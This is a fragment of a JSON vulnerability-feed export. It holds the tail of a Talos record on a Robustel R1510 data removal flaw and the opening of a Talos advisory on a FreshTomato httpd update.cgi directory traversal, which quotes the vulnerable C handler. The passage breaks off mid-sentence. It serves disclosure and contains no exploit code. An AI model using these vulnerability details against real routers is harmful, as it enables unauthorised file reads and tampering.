"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-06-30T00:00:00", "type": "talos", "title": "Robustel R1510 web_server /action/remove/ API data removal vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28127"], "modified": "2022-06-30T00:00:00", "id": "TALOS-2022-1571", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1571", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-12-02T18:55:50", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1642\n\n## FreshTomato httpd update.cgi directory traversal vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-38451\n\n##### SUMMARY\n\nA directory traversal vulnerability exists in the httpd update.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nFreshTomato 2022.5 \nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020 \nAdvancedTomato commit 67273b0\n\n##### PRODUCT URLS\n\nFreshTomato - <https://www.freshtomato.org/> QUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N\n\n##### CWE\n\nCWE-22 - Improper Limitation of a Pathname to a Restricted Directory (\u2018Path Traversal\u2019)\n\n##### DETAILS\n\nFreshTomato is an open source firmware based on linux. The firmware offers several features for Broadcom-based routers.\n\nThe FreshTomato\u2019s httpd component offers a simple template language to call an API during the loading of the HTML page. This process is performed through `asp api`. The `asp api` normally is not directly callable, but a FreshTomato\u2019s API called `update.cgi` will allow it.\n\nFollowing is one of the functions responsible for performing the `update.cgi` API:\n \n \n static void wo_update(char *url)\n {\n const aspapi_t *api;\n const char *name;\n int argc;\n char *argv[16];\n char s[32];\n \n if ((name = webcgi_get(\"exec\")) != NULL) {\n for (api = aspapi; api->name; ++api) {\n if (strcmp(api->name, name) == 0) {\n for (argc = 0; argc < 16; ++argc) {\n snprintf(s, sizeof(s), \"arg%d\", argc);\n if ((argv[argc] = (char *)webcgi_get(s)) == NULL) break;\n }\n api->exec(argc, argv);\n break;\n }\n }\n }\n }\n \n\nThe `wo_update` function will take an `exec` parameter